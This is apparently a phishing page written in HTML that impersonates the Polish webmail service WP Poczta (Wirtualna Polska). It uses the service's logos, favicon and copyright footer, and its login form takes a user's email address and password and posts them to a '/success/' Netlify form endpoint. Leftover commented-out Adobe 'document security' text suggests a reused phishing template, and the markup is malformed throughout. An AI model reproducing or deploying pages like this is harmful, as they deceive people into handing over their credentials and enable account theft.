<!DOCTYPE html>
<html>
<link rel="shortcut icon" href="https://pocztanh.wpcdn.pl/pocztanh/uil/v4.25.1/images/wp/favicon.ico" type="image/x-icon">
<header>
 </head>
	<meta charset="UTF-8">
	<title>Poczta - Najlepsza Poczta, największe załączniki - WP</title>
	<link href="style.css" rel="stylesheet">
</head>
	<link href="style.css" rel="stylesheet">
		<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
<p>
<style>
body {
  background-image: url('https://v.wpimg.pl/XzAxLmpwdxsgGjpeXwx6DmNCbg4AHwcXIBUvT1xVLVh7WmNYSEZuSW40IwoZGRoVOVV-XUJFaE5wTRhdSUdhSXMiYV1ARnc2Lh8lAzIYIFVwQX5dCEZoSHUnGz0vMS0WLSccDBcSBzYuHyUDLxU3Ah4vJQgcHDkXLhsTPxEVOQ4uDxNdQVkyCiZaMQ');
  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: 100% 100%;
}
</style>
	<img "center" alt="sas Internet Email"src="https://pocztanh.wpcdn.pl/pocztanh/uil/v4.25.1/svg/wp/poczta-logo.svg" width="200" height="60">
<div>
<p>
<div class="login-page">
<div class="form">
<br>
<br>
<div style="text-align:center;">
</span>
<!-- <h2 style="color:black;"> MyAccount Login -->
</p>
<form name='contact' action='/success/' method='POST'><input type='hidden' name='form-name' value='contact' />
  <div class="text-center text-gray-800 text-lg text-bold my-4">
	<body>
</style>
<body>
  </div>

    </p>
<br>
<fieldset>
<div style="text-align:center;">
</span>
<br>
<p>
<h3 style="color:black;"> Logowanie do Mojego Konta
<p>
<form name="contact"  action="/success/" method="POST" data-netlify="true">
<p>
<br>
					</span>
		<section id="login_form" class="flex flex-col justify-between px-3">
				<div class="formfield">
					<label for="username"></label>
					<input type="text" id="username" name="username" value="" placeholder="Wpisz swój adres e-mail" autofocus="" required="">
				<div class="formfield">
				<p>
					<label for="password"></label>
					<div class="flex relative items-baseline">
						<input id="password" type="password" name="password" value="" placeholder="Wprowadź hasło" required="">
<br>
<br>
<button type="Login submit-button">ZALOGUJ SIĘ<span style='font-size:20px;'><!-- &#8680;</span>  <i class="fa fa-lock"></i></button> -->

			</div>	 
            <div>              
</div>
<p>
<br>
<br>
<br>

	  <!-- <p style="color:gold;">Document security</p> -->
	  <!-- <img align="top" alt=" Adobe" src="https://www.adobe.com/content/dam/cc/icons/reader_appicon_64_grayscale.svg" width="65" height="50"> -->
<!-- 	  <h5 style="color:#0073cf;">256-bit SSL encryption, OAuth 2.0 authentication, encrypted storage.</p>
 --></p>
  
</form>
</form>
  </p>
</form>
		
</div>		
</style>
</head>
<body>

<h2></h2>
<p></p>

<div class="footer">
<style>
/* Style the body */
body {
  font-family: Arial;
  margin: 0;
}

/* Header/Logo Title */
.header {
  padding: 30px;
  text-align: center;
  background: #062a78;
  color: white;
  font-size: 13px;
}
</style>
</head>
<body>
</style>
<p>
<img "center" alt="sas Internet Email"src="https://upload.wikimedia.org/wikipedia/commons/9/90/Wirtualna-Polska-Logo-2014.png" width="100" height="50">
<br>
<!-- <div class="header"> -->
<br>
<br>
<br>
  <p>© 1995-2022 Wirtualna Polska Media S.A. •Reklama •O nas •Prywatność •Regulamin •Regulamin dodawania opinii •Telewizja WP •Serwisy</p>
</div>

</div>

</body>
</html>
</div>
<div class="form">